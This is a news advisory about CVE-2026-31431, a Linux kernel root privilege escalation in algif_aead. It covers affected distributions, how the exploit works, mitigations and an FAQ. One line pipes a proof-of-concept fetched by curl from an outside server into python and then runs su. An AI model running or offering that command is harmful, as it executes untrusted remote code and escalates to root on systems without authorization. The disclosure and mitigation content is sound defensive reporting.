Linux Root Exploit CVE-2026-31431 Hits Most Distros Since 2017

Key Takeaways

• CVE-2026-31431 grants instant root access to unprivileged local users on most Linux distributions
• The vulnerability has existed since 2017 and affects Ubuntu, RHEL, SUSE, Amazon Linux, and WSL2
• Kernel patches are available, but distro-specific fixes are still rolling out

A Cryptography Shortcut Gone Wrong

Security researchers at Xint Code have disclosed CVE-2026-31431, a privilege escalation vulnerability that grants instant root access to any local unprivileged user. The exploit requires just 732 bytes of code to execute. It has existed in the Linux kernel since 2017.

The bug sits in algif_aead, a kernel function that handles authenticated encryption. The function includes a performance optimization that avoids copying data. Instead, it chains tag data directly onto the output buffer by reference. This optimization creates the opening attackers need.

What's Affected

The vulnerability affects nearly every major Linux distribution in production use. Xint Code confirmed the following are vulnerable:

• Ubuntu 24 (version 26 released last week)
• RHEL 10
• SUSE 16
• Amazon Linux 2023
• Windows WSL2

The impact extends beyond desktop systems. Multi-user servers, container environments like Kubernetes, CI/CD pipelines, and web servers all face exposure. Any environment where users have local shell access is at risk.

How the Exploit Works

AF_ALG is a socket interface that lets applications request encryption or decryption from the kernel. You provide data and a tag. The kernel handles the cryptographic operations.

The attack works by providing a splice of an executable you have access to as the tag. The obvious choice is "su", the command that switches users. Because algif_aead chains the tag data by reference rather than copying it, the attacker gains write access to the executable's memory pages.

The authencesn encryption algorithm writes 4 bytes at a fixed offset in its output buffer. Since the tag (the "su" executable's page data) is chained by reference, those 4 bytes overwrite part of the binary. This gives the attacker control over execution.

Checking Your Systems

Xint Code published a proof-of-concept. You can test vulnerability by running this command as an unprivileged user:

curl https://copy.fail/exp | python3 && su

A word of caution: this command downloads and executes code from an external server. If you prefer not to trust that, Xint Code has published the source code for manual review and execution.

Patching and Mitigation

The Linux kernel already has a patch available. However, the short disclosure window left distro maintainers scrambling. Not all distributions have released updated packages yet.

If your distro's patch isn't ready, two mitigation options exist:

Option 1: Disable the Module

If your kernel loads algif_aead as a module, you can block it from loading:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf

Option 2: Block AF_ALG Sockets

Some distributions compile algif_aead directly into the kernel. RHEL and WSL2 are among them. For these systems, you need to prevent users from opening AF_ALG sockets entirely. This can be done through seccomp profiles, AppArmor, or SELinux policies.

The Disclosure Timeline Question

Xint Code did not explain why they disclosed the vulnerability so quickly. They did note that an AI assistant helped them find the bug. Given that the Linux kernel source code is public, they may have reasoned that any serious attacker could find it just as easily.

This raises an uncomfortable question for open-source security. AI tools can now scan millions of lines of public code for exploitable patterns. The traditional coordinated disclosure window may need rethinking when both defenders and attackers have access to the same automated discovery tools.

What to Do Now

1. Audit which systems have local user access. Prioritize multi-user servers, container hosts, and CI/CD runners.
2. Check your distribution's security advisories for CVE-2026-31431 patches.
3. Apply kernel updates immediately where available.
4. Implement mitigations on systems without patches. Use module blocking or socket restrictions.
5. Review access controls. Consider whether all users who have local shell access actually need it.

Frequently Asked Questions

Does CVE-2026-31431 affect cloud servers?

Yes. Any Linux server where users have local shell access is vulnerable. This includes shared hosting, multi-tenant environments, and systems running containers with user-accessible shells.

Can this exploit be used remotely?

No. The attacker needs local user access to the system. However, combined with other exploits that grant initial access, it becomes a powerful escalation path.

Is WSL2 on Windows really affected?

Yes. WSL2 runs a real Linux kernel, and Microsoft's kernel build includes the vulnerable algif_aead functionality compiled directly in.

How long has this vulnerability existed?

The vulnerable code was introduced in 2017. It remained undetected for approximately eight years.

Should I reboot after applying the kernel patch?

Yes. Kernel updates require a reboot to take effect. The vulnerable code will remain in memory until you restart the system.

Source: Latest from Tom's Hardware